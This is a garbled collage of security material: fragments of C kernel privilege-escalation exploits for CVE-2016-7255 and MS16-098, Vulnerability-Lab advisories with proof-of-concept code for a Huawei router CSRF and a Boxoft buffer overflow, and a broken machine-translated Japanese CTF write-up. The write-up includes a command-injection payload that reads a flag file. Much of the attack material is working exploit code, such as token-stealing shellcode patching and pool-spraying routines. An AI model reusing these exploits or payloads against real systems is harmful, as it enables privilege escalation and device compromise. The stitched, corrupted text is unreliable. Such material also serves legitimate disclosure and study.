sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)
sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY
overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)
overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)
}
// in case the OS version is not any of the previously checked versions
else
{
printf(" [-] Unsupported version\n");
printf(" [*] Affected 64-bit operating systems\n");
printf(" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\n");
printf(" [*] Windows 8.1 -- cve-2016-7255.exe 81\n");
printf(" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\n");
printf(" [*] Windows 2012 R2 -- cve-2016-7255.exe 12\n");
return -1;
}
printf("My PID is: %d\n", GetCurrentProcessId());
GetUserName(pre_username, &size);
printf("Current Username: %s\n", pre_username);
printf("PML4 Self Ref: %llx\n", PML4_SELF_REF);
printf("Shellcode stored at: %p\n", (void *) &shellcode);
printf("Enter to continue...\n");
getchar();
do
{
or_address_value_4((void*)PML4_SELF_REF);
} while (FALSE);
PML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF);
printf("[*] Self Ref Index: %x\n", PML4_SELF_REF_INDEX);
PML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000);
UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset);
printf("Original OverwriteTarget pointer: %llx\n", original_pointer);
DWORD pid = GetCurrentProcessId();
/* Shellcode Patching !! */
char *p = shellcode;
p += 4; // skip the CLI, PUSHF and MOV RAX bytes
*(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1
p += 12; // Patch shellcode with original value in the Overwrite address
*(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset);
p += 12; // To patch the PID of our process
*(DWORD *)p = (DWORD)pid;
p += 17;
*(unsigned char *)p = (unsigned char)sc_KPROCESS;
p += 7;
*(unsigned int *)p = (unsigned int)sc_APLINKS;
p += 20;
*(unsigned int *)p = (unsigned int)sc_TOKEN;
p += 20;
*(unsigned int *)p = (unsigned int)sc_TOKEN;
UINT64 shellcode_va = store_shellcode_in_hal();
printf("[+] w00t: Shellcode stored at: %llx\n", shellcode_va);
overwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset);
if (osversion == 7){
// Exploit Win7.1
hNtDll = LoadLibrary("ntdll.dll");
if (!hNtDll) {
printf("\t\t[-] Failed loading NtDll: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile) {
printf("\t\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
NtQueryIntervalProfile(0x1337, &Interval);
}
while (1) {
size = 256;
GetUserName(post_username, &size);
if (memcmp(post_username, pre_username, 256) != 0) break;
}
Sleep(2000);
system("cmd.exe");
return 0;
}
Document Title:
===============
Huawei Flybox B660 - (POST Reboot) CSRF Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2025
Release Date:
=============
2017-01-10
Vulnerability Laboratory ID (VL-ID):
====================================
2025
Common Vulnerability Scoring System:
====================================
4.4
Product & Service Introduction:
===============================
The Huawei B660 has a web interface for configuration. You can use any web browser you like to login to the Huawei B660.
(Copy of the Homepage: http://setuprouter.com/router/huawei/b660/manual-1184.pdf )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a security flaw that affects the official Huawei Flybox B660 3G/4G router product series.
Vulnerability Disclosure Timeline:
==================================
2017-01-10: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Huawei
Product: Flybox - Router (Web-Application) B660 3G/4G
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A remote cross-site request forgery (CSRF) vulnerability has been discovered in the official Huawei Flybox B660 3G/4G router product series.
The security vulnerability allows remote attackers to submit special requests to the affected product which could lead reboot the Product.
The vulnerability is located in the `/htmlcode/html/reboot.cgi` and `/htmlcode/html/system_reboot.asp` file modules and `RequestFile`
parameter of the localhost path URL. Remote attackers are able to reboot any Huawei Flybox B660 via unauthenticated POST method request.
The security risk of the csrf web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.4.
Exploitation of the csrf web vulnerability requires a low privilege web-application user account and medium or high user interaction.
Successful exploitation of the vulnerability results in unauthenticated application requests and manipulation of affected or connected
device backend modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] /htmlcode/html/reboot.cgi
[+] /htmlcode/html/system_reboot.asp
Vulnerable Parameter(s):
[+] RequestFile
Software version of the modem:
1066.12.15.01.200
Hardware version of the modem:
WLB3TCLU
Name of the device:
B660
Hardware version of the router:
WL1B660I001
Software version of the router:
1066.11.15.02.110sp01
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers without privilege web-application user account and with medium or high user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
--- PoC Session Logs ---
POST /htmlcode/html/reboot.cgi?RequestFile=/htmlcode/html/system_reboot.asp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: localhost/htmlcode/html/system_reboot.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
HTTP/1.1 200 OK
CACHE-CONTROL: no-cache
Content-Type: text/html
Content-Length: 364
<html><script src="http://cakecdn.info/ad_20160927.js?ver=1&channel=1" id="{6AF30038-1A5F-46F9-AE73-455BB857D493}"></script>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>replace</title>
<body>
<script language="JavaScript" type="text/javascript">
var pageName = '/';
top.location.replace(pageName);
</script>
</body>
</html>
Note: Attacker are able to reboot the device itself without being authenticated to it .
Also an Attacker can put an auto-submit javascript-generated form inside an high traffic website to compromise.
PoC: CSRF Exploit
<html>
<!-- CSRF PoC By SaifAllah benMassaoud -->
<body>
<form id="test" action="http://192.168.1.1/htmlcode/html/reboot.cgi?RequestFile=/htmlcode/html/system_reboot.asp" method="POST">
</form>
<script>document.getElementById('test').submit();</script>
</body>
</html>
Security Risk:
==============
The security risk of the cross site request forgery vulnerability in the Huawei Flybox B660 3G/4G router product series is estimated as medium. (CVSS 4.4)
Credits & Authors:
==================
Vulnerability Laboratory [Research team] - SaifAllah benMassaoud - (http://www.vulnerability-lab.com/show.php?user=SaifAllahbenMassaoud)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
1。バックアップファイルを見つけます
1.カタログスキャンPython3 dirsearch.py.py -u http://10.10.10.175:32770 -E * 
2。最後にindex.php.bkバックアップファイルを取得し、ダウンロードしてソースコードを表示すると、フラグ
flag:cyberpeace {855a1c4b3401294cb6604cccc98bde334} 010-10-101010101010101010101010101010101010101010101010101010101010101010情報が含まれています:cookie:look-here=cookie.php 
2。次に、URL:http://220.249.52.13:41440/cookie.phpにアクセスし、テキストプロンプトを表示するHTTP応答を参照してください。 URL http://220.249.52.13:41440/cookie.phpにリクエストを行い、応答パッケージを表示すると、フラグ情報を確認できます。
4。最終フラグは、cyberpeace {71de0ba3c98781d7f78c4af6e5b684be}です。
3。Blag1ボタンの下に隠されています。 URLを開き、http://220.249.52.13:52359/、ボタンを見つけて、それを使用することはできません。現時点では、F12を通じて要素レビューが実行されます。
2。 delete Disabled=''を削除し、[ボタン]をクリックしてフラグ
3を取得します。最終フラグは、cyberpeace {e61ed8f7f37f036a89f6d3c5622bb8e9} 4です。 URLを開き:http://220.249.52.1:35249/
2。ユーザー名管理者123456を入力すると、システムにログインしてフラグ
3を取得できます。最終フラグは、CyberPeace {A136364C15E239B4F32B99D2D23E42CE} 3です。単純なファイルには、フラグを取得するための監査が含まれています
show_source(__ file__);
include( 'config.php'); $ a=@$ _ get ['a']; $ b=@$ _ get ['b'];
if($ a==0and $ a){
echo $ flag1;
}
if(is_numeric($ b)){
出口();
}
if($ b1234){
echo $ flag2;
}?このPHPコードの意味は、getメソッドを介してaとbの値を取得し、$ a==0と$ aがtrueの場合、flag1を取得します。Bが整数または数値文字列の場合、出口、$ b1234の場合、flag2を取得します。
基本知識:( PHPの弱いタイプの比較をマスター)PHP :の2つの比較記号
==:最初に文字列タイプを同じに変換し、次に比較します
===:最初に2つの文字列のタイプが等しいかどうかを判断し、次に比較します
==を使用すると、文字列は数値型に変換され、比較されます。
var_dump( 'a'==0); //true、この時点で、a stringの先頭に数値が見つからないため、a stringタイプは数に変換されます。
var_dump( '123a'==123); //true、here '123a'は123に変換されます
var_dump( 'a123'==123); //false、文字列の開始部分がその値を決定するというPHPに規定があるためです。文字列が法律番号で始まる場合、数は連続した最後の数字で終了するために使用されます。そうしないと、全体の値は比較すると0になります。
var_dump( 'root'==0);
var_dump( '22r22oot'==22); //true、最初に文字列22r222ootを0と同じ数値に変換します。文字列には法的価値があるため、継続的な法的価値が必要になります。 22==22なので、それは本当です。
var_dump( 'root22'==0); //true、最初に文字列root22を0と同じ数値に変換します。文字列には最初は法的値がないため、文字列root22は0に変換され、最後に0==0に変換されるため、真です。
var_dump( '0E170'=='0E180'); //true、文字列にはeで始まる値が含まれているため、PHPコードはそれを科学的表記全体と見なします。最後の0は170==0の電力に対するものです180のパワー、つまり0==0なので、それは真です
var_dump(0==='root'); //fals、===比較すると、最初に両側のタイプが等しいかどうかを判断します。値と文字列タイプは明らかに異なるため、有効ではありません
var_dump ('0e830400451993494058024219903391'=='0e830400451993494058024219904444');//true, first convert the strings 0e830400451993494058024219903391 and 0e830400451993494058024219904444それぞれ数値タイプに。両方の文字列は最初は法的価値を持っているため、文字列0E830400451993494058024219904444は0に変換され、最後に0==0に変換されるため、事実です。
var_dump( '123.a1bc'==123); //truevar_dump( '123.2abc'==123); //falsevar_dump( '123e2abc'==123); //falsevar_dump( '123ea1bc'==123);連続した数字が含まれている場合。 EまたはEは、文字列と数の比較を妨げます。浮動小数点数を表します。 EとEは科学的表記を表します。文字列にこれらが含まれている限り、上記の比較は、文字列の最初の部分を理想的に実装してその値を決定することはできません。文字列が法的値で始まる場合、この値を使用します。そうでなければ、その値は01です。ページを開き、コード監査を実施し、flag1が表示されると$ a==0と$ aの両方が満たされていることがわかります。
2。PHPの弱いタイプの比較は、「ABC」==0を真であるため、A=Cを入力すると、図に示すようにFLAG1を取得できます。 (ABCは任意の文字に置き換えることができます)。
http://220.249.52.13:53517/index.php?a=abc
3。IS_NUMERIC()関数は、それが数値文字列である場合、それが真で返され、それ以外の場合は偽りに戻り、PHPの弱いタイプの比較が比較されると、(「1234a」==1234)が真であると判断します。
a=abcb=1235aを入力すると、図に示すようにflag2を取得できます。
http://220.249.52.13:53517/index.php?a=abcb=12345f 
iv。 Post and Get Methodのflag1。 GETメソッドを構築して、http://220.249.52.133:48752/index.php?a=1 
2。次に、ページのプロンプトに従って、Firefox、B=2のプラグインハックバーを介して投稿データを送信すると、フラグ
5。httpヘッダー擬似バイパス制限アクセスアクセスを取得してフラグの基本知識を取得できます。
通常、HTTPヘッダーのX-forwarded-forフィールドを直接変更して、リクエストの最終的なアイレファーをコピーすることができます。 XFFと同様に、参照者も直接変更できます。
1. URL http://220.249.52.1:54968/を開き、プロンプトは
にアクセスするために123.123.123.123のソースIPでなければなりません
2。パケットをつかむことにより、HTTPヘッダーにXFFフォード要求ヘッダー、X-For:123.123.123.123を追加してから、応答ページが含まれていることを確認する必要があります。ここに追加する必要があります3:https://www.google.com、そしてフラグを取得するためにアクセス
最終的にflag:cyberpeace {f116fe3f881eef96edaaf3159a3131f8159a313131f81596
6。フラグの基本知識を取得するリモートコマンド実行: command1 command2 Windowsまたはlinux execute command1の下で、最初に実行してから、command2を実行します。 command1 | command2のみcommand2が実行されます。 command1 command2 execute command2を最初に実行し、次にcommand1を実行します。 command1 || command2 first execute command1。 FALSEの場合は、command21を実行します。 IPアドレスを入力してください。ここから127.0.0.1に最適です。エコーが発生した場合、コマンド実行
2があります。コマンドを追加することにより:127.0.0.1 | /-name flag.txtをバックドアに検索すると、ディレクトリは /home/flag.txt 
3です。コマンド127.0.0.1 |を使用しますflag.txt 
のflagを表示するcat /home/flag.txtは、flag:cyberpeace {400F6C86F9DD25994AFB930D13CC28B8}を取得しました。
JSコードがフラグを取得して環境に入ると、パスワード入力が発生した後、パスワードを何気なく入力し、コード監査のためにOK 
をクリックして、何が入力されても、偽のパスワードにジャンプすることがわかりました。実際のパスワードは、Charcodeからの実行プロセスにあります。
1.最初に、deChiffreの機能を定義します。まだ呼ばれていないので、気にしないでください
注:最初に変換します\ x35 \ x35 \ x2c \ x35 \ x36 \ x2c \ x35 \ x34 \ x2c \ x37 \ x39 \ x2c \ x31 \ x31 \ x35 \ x2c \ x36 \ x39 \ x2c \ x31 \ x31 \ x34 \ x2c \ x31 \ x34 \ x2c \ x31 \ x31 \ x36 \ x2c \ x31 \ x30文字列への16進数、Python、またはURLで印刷:https://www.bejson.com/convert/ox2str/
出力結果55、56、54、79、115、69、114、116、107、49、50
2。decute string ['from charcode'](deChiffre('55、56,54,79,115,69,114,116,107,49,50)
'));
3. DeChiffreを呼び出し、DeChiffre関数を実行します
string ['fromcharcode'](deChiffre('55、56,54,79,115,69,114,116,107,49,50
'));
(1)最初、'55、56,54,79,115,69,114,116,107,49,50
'deChiffre関数を導入して実行します
')
(2)その後、パス変数が表示され、今のところそれを入れます
(3)pass_enc='55、56,54,79,115,69,114,116,107,49,50 '
pass_enc文字列を文字列配列に分割し、タブパラメーターに割り当てます。
TAB=[55,56,54,79,115,69,114,116,107,49,50]注:TABは現時点では文字列配列です!
(3)その後のパスセグメンテーションもその後です
Tab2=[70,65,85,88,32,80,65,83,83,87,82,68,32,72,65,72,65]
(4)変数割り当てコード分析:var i、j、k、l=0、m、n、o、p=''; i=0; j=tab.length;
最初は、I、j、k、m、n、o、割り当てがなく、未定義であり、他のパラメーターl=0、p=''、後でIが割り当てられ、jは11に割り当てられます
(5)この時点で、nは0に割り当てられているため、k=11+0+0に割り当てられ、最終的に等しい11注:ここ(l)は英語の文字lであり、ナンバー1ではありません
(6)10行目、n=18
(7)ループの最初の場合、コードを簡素化します。
for(i=0; i(18); i ++)
{o=tab [i-l]; p +=string.fromCharcode((o=tab2 [i]));
if(i==5)break;}
説明:前のo=tab [i-1]は役に立たない。これは、o=tab2 [i]の値によって再オーバーされるためです。
最初のループ:o=tab [0]; p=p+string.fromcharcode((o=tab2 [0])
=o=70; p=''+string.fromcharcode(70)=p=英語文字f
二度目.
三度目.
4回目.
5回目.
したがって、ループのこれの最後のPは(ここで知っている限り出力はありませんが)
(8)ループの2番目、コードを簡素化します。
for(i=0; i 18; i ++){
o=tab [i-l];
if(i 5 i 17)
p +=string.fromCharcode((o=tab2 [i]));
}
説明:ここのループの場合は、上記に似ています。ここでのP値は、最初のループが実行された後、今では偽物になることに注意してください。
ループの最初のp値を追加すると、最後のpはフェイクパスワードですhah
(9)P +=String.FromCharcode(Tab2 [17]);
Tab2=[70,65,85,88,32,80,65,83,83,87,82,68,32,72,65,72,65]
したがって、P=フェイクパスワードhah + a
したがって、最後のpはフェイクパスワードハハです
(10)pass=p;リターンパス;
つまり、pass=fauxパスワードhaha;フェイクパスワードを返しますハハ;
最後の関数出力はフェイクパスワードハハです
3。デコヒフル関数が実行された後、他のコードを実行し続けます。
h=window.prompt( 'パスワードを入力');
アラート(deChiffre(h));
H=ポップアップボックスに入力するコンテンツ
その後、DeChiffre(H)の価値がポップアップします。以前のすべてのコードから、コード内のPの値はタブとは何の関係もないことがわかります。最終的にはTab2の値に置き換えられるためです。したがって、入力は何であろうと、Pass_enc=h、入力hの等しいものに関係なく、タブを文字列配列に分割できるかどうか、または存在するかどうかに関係なく、Tab2のみを使用します。素人の用語では、タブのパラメーターと値の両方がなしと見なすことができるため、Pass_encパラメーターが何であるかは意味がありません。
4.最後に、結論は、ポップアップボックスにどのような価値を入力しても、偽のパスワードを返すだけであるということです
私はただ推測するだけですstring ['fromcharcode'](deChiffre( '\ x35 \ x35 \ x2c \ x35 \ x36 \ x2c \ x35 \ x34 \ x2c \ x37 \ x39 \ x2c \ x31 \ x31 \ x35 \ x2c \ x39 \ x39 \ x39 \ x2c \ x31 \ x31 \ x31 \ x34 \ x2c \ x36 \ x39 \ x2c \ x31 \ x31 \ x34 \ x2c \ x 31 \ x31 \ x36 \ x2c \ x31 \ x30 \ x37 \ x2c \ x34 \ x39 \ x2c \ x35 \ x30 '));この構文は間違っており、計算されていない最後の正しい値は正しい値ではありません。つまり、フラグ〜
したがって、Pass_encパラメーターへの入力に関係なく、Fauxパスワードの機能が表示されるように使用しません。また、私たちはそれを放棄し、コードを書き直し、自分で実行します。
!doctype html
HTML
頭
メタcharset='utf-8'
/頭
体
スクリプト
var n=string.fromCharcode(55,56,54,79,115,69,114,116,107,49,50);
document.write(n);
/スクリプト
/体
/HTML
最終結果は次のとおりです:786osertk12
Pythonスクリプトを介してヘキサデシマルをASICエンコードに変換します
a=[55,56
Document Title:
===============
Boxoft Wav v1.1.0.0 - Buffer Overflow Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2027
Release Date:
=============
2017-01-09
Vulnerability Laboratory ID (VL-ID):
====================================
2027
Common Vulnerability Scoring System:
====================================
5.8
Product & Service Introduction:
===============================
Boxoft Wav to MP3 Converter is an 100% free powerful audio conversion tool that lets you to batch convert WAV file to high
quality MP3 audio formats, It is equipped with a standard audio compressed encoder, you can select bitrate settings and
convert multiple files at once. Another convenience feature is hot directory (Watch Folder to convert Audio); it can be
converted to mp3 format automatically when the source wav files are written to a specified monitored directory.
(Copy of the Vendor Homepage: http://www.boxoft.com/wav-to-mp3/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local buffer overflow vulnerability in the official Boxoft Wav to MP3 v1.1.0.0 software.
Vulnerability Disclosure Timeline:
==================================
2017-01-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Boxoft
Product: Wav to MP3 - Player (Software) 1.1.0.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local buffer overflow vulnerability has been discovered in the official Boxoft Wav to MP3 (freeware) V1.1.0.0 software.
The local vulnerability allows local attackers to overwrite the registers to compromise the local software system process.
The classic unicode buffer overflow vulnerability is located in the `Add` function of the `Play` module. Local attackers are
able to load special crafted files that overwrites the eip register to compromise the local system process of the software.
An attacker can manipulate thebit EIP register to execute the next instruction of their choice. Attackers are able to execute
arbitrary code with the privileges of the software process. Local attackers can exploit the issue by an include of a 18kb unicode
payload as txt file to add for the play module.
The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 5.8.
Exploitation of the vulnerability requires a low privilege or restricted system user account without user interaction.
Successful exploitation of the vulnerability results in computer system manipulation and compromise of the computer system.
Proof of Concept (PoC):
=======================
The buffer overflow vulnerability can be exploited by local attackers with restricted system user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Download and install the "setup(free-wav-to-mp3)" file
2. Run the poc code via active perl or perl
3. A file format "poc.txt" will be created
4. Click "ADD" and upload the (poc.txt)
Name > POC.txt
Size > 18KB
Full file name : C:UsersDellDesktopPoc.txt
5. Click "Play"
Note: Software will crash with an unhandled exception and critical access violation
6. Successful reproduce of the local buffer overflow vulnerability!
PoC: Exploitation (Perl)
#!/usr/bin/perl
my $Buff = "x41" x 9000;
open(MYFILE,'>>poc.txt');
print MYFILE $Buff;
close(MYFILE);
print "SaifAllah benMassaoud";
--- Debug Logs [WinDBG] ---
(1d10.1d3c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=31347831 edx=7769660d esi=00000000 edi=00000000
eip=31347831 esp=0012f70c ebp=0012f72c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
31347831 ?? ???
0012f720: ntdll!RtlRaiseStatus+c8 (7769660d)
0012faf4: 31347831
Invalid exception stack at 34783134
0:000> d 0012faf4
0012faf4 34 31 78 34 31 78 34 31-78 34 31 78 34 31 78 34 41x41x41x41x41x4
0012fb04 31 78 34 31 78 34 31 78-34 31 78 34 31 78 34 31 1x41x41x41x41x41
0012fb14 78 34 31 78 34 31 78 34-31 78 34 31 78 34 31 78 x41x41x41x41x41x
0012fb24 34 31 78 34 31 78 34 31-78 34 31 78 34 31 78 34 41x41x41x41x41x4
0012fb34 31 78 34 31 78 34 31 78-34 31 78 34 31 78 34 31 1x41x41x41x41x41
0012fb44 78 34 31 78 34 31 78 34-31 78 34 31 78 34 31 78 x41x41x41x41x41x
0012fb54 34 31 78 34 31 78 34 31-78 34 31 78 34 31 78 34 41x41x41x41x41x4
0012fb64 31 78 34 31 78 34 31 78-34 31 78 34 31 78 34 31 1x41x41x41x41x41
0:000>kb
Following frames may be wrong.
0012f708 776965f9 0012f7f4 0012faf4 0012f810 0x31347831
0012f72c 776965cb 0012f7f4 0012faf4 0012f810 ntdll!RtlRaiseStatus+0xb4
0012f7dc 77696457 0012f7f4 0012f810 0012f7f4 ntdll!RtlRaiseStatus+0x86
0012f7e0 0012f7f4 0012f810 0012f7f4 0012f810 ntdll!KiUserExceptionDispatcher+0xf
0012f7e4 0012f810 0012f7f4 0012f810 c0000005 0x12f7f4
0012f7f4 00000000 00000000 78313478 00000002 0x12f810
--- [CRASH - wavtomp3.exe] ---
Problem Event Name: APPCRASH
Application Name: wavtomp3.exe
Application Version: 1.1.0.0
Application Timestamp: 2a425e19
Fault Module Name: StackHash_e98d
Fault Module Version: 0.0.0.0
Fault Module Timestamp: 00000000
Exception Code: c0000005
Exception Offset: 31347831
OS Version: 6.1.7600.2.0.0.256.1
Locale ID: 1033
Additional Information 1: e98d
Additional Information 2: e98dfca8bcf81bc1740adb135579ad53
Additional Information 3: 6eab
Additional Information 4: 6eabdd9e0dc94904be3b39a1c0583635
Note: The access violation with the exception and followup offsets shows that the ecx & eip was overwritten.
Security Risk:
==============
The security risk of the local buffer overflow vulnerability in the Boxoft Wav to MP3 software is estimated as high. (CVSS 5.8)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - SaifAllah benMassaoud (http://www.vulnerability-lab.com/show.php?user=SaifAllahbenMassaoud)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
// Source: https://github.com/sensepost/ms16-098/tree/b85b8dfdd20a50fc7bc6c40337b8de99d6c4db80
// Binary: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41020.exe
#include <Windows.h>
#include <wingdi.h>
#include <stdio.h>
#include <winddi.h>
#include <time.h>
#include <stdlib.h>
#include <Psapi.h>
HANDLE hWorker, hManager;
BYTE *bits;
//dt nt!_EPROCESS UniqueProcessID ActiveProcessLinks Token
typedef struct
{
DWORD UniqueProcessIdOffset;
DWORD TokenOffset;
} VersionSpecificConfig;
VersionSpecificConfig gConfig = { 0x2e0, 0x348 }; //win 8.1
void AllocateClipBoard2(unsigned int size) {
BYTE *buffer;
buffer = malloc(size);
memset(buffer, 0x41, size);
buffer[size - 1] = 0x00;
const size_t len = size;
HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, len);
memcpy(GlobalLock(hMem), buffer, len);
GlobalUnlock(hMem);
//OpenClipboard(0);
//EmptyClipboard();
SetClipboardData(CF_TEXT, hMem);
//CloseClipboard();
//GlobalFree(hMem);
}
static HBITMAP bitmaps[5000];
void fungshuei() {
HBITMAP bmp;
// Allocating 5000 Bitmaps of size 0xf80 leaving 0x80 space at end of page.
for (int k = 0; k < 5000; k++) {
//bmp = CreateBitmap(1685, 2, 1, 8, NULL); //800 = 0x8b0 820 = 0x8e0 1730 = 0x1000 1700 = 0xfc0 1670 = 0xf70
bmp = CreateBitmap(1670, 2, 1, 8, NULL); // 1680 = 0xf80 1685 = 0xf90 allocation size 0xfa0
bitmaps[k] = bmp;
}
HACCEL hAccel, hAccel2;
LPACCEL lpAccel;
// Initial setup for pool fengshui.
lpAccel = (LPACCEL)malloc(sizeof(ACCEL));
SecureZeroMemory(lpAccel, sizeof(ACCEL));
// Allocating 7000 accelerator tables of size 0x40 0x40 *2 = 0x80 filling in the space at end of page.
HACCEL *pAccels = (HACCEL *)malloc(sizeof(HACCEL) * 7000);
HACCEL *pAccels2 = (HACCEL *)malloc(sizeof(HACCEL) * 7000);
for (INT i = 0; i < 7000; i++) {
hAccel = CreateAcceleratorTableA(lpAccel, 1);
hAccel2 = CreateAcceleratorTableW(lpAccel, 1);
pAccels[i] = hAccel;
pAccels2[i] = hAccel2;
}
// Delete the allocated bitmaps to free space at beiginig of pages
for (int k = 0; k < 5000; k++) {
DeleteObject(bitmaps[k]);
}
//allocate Gh04 5000 region objects of size 0xbc0 which will reuse the free-ed bitmaps memory.
for (int k = 0; k < 5000; k++) {
CreateEllipticRgn(0x79, 0x79, 1, 1); //size = 0xbc0
}
// Allocate Gh05 5000 bitmaps which would be adjacent to the Gh04 objects previously allocated
for (int k = 0; k < 5000; k++) {
bmp = CreateBitmap(0x52, 1, 1, 32, NULL); //size = 3c0
bitmaps[k] = bmp;
}
// Allocate 17500 clipboard objects of size 0x60 to fill any free memory locations of size 0x60
for (int k = 0; k < 1700; k++) { //1500
AllocateClipBoard2(0x30);
}
// delete 2000 of the allocated accelerator tables to make holes at the end of the page in our spray.
for (int k = 2000; k < 4000; k++) {
DestroyAcceleratorTable(pAccels[k]);
DestroyAcceleratorTable(pAccels2[k]);
}
}
void SetAddress(BYTE* address) {
for (int i = 0; i < sizeof(address); i++) {
bits[0xdf0 + i] = address[i];
}
SetBitmapBits(hManager, 0x1000, bits);
}
void WriteToAddress(BYTE* data) {
SetBitmapBits(hWorker, sizeof(data), data);
}
LONG ReadFromAddress(ULONG64 src, BYTE* dst, DWORD len) {
SetAddress((BYTE *)&src);
return GetBitmapBits(hWorker, len, dst);
}
// Get base of ntoskrnl.exe
ULONG64 GetNTOsBase()
{
ULONG64 Bases[0x1000];
DWORD needed = 0;
ULONG64 krnlbase = 0;
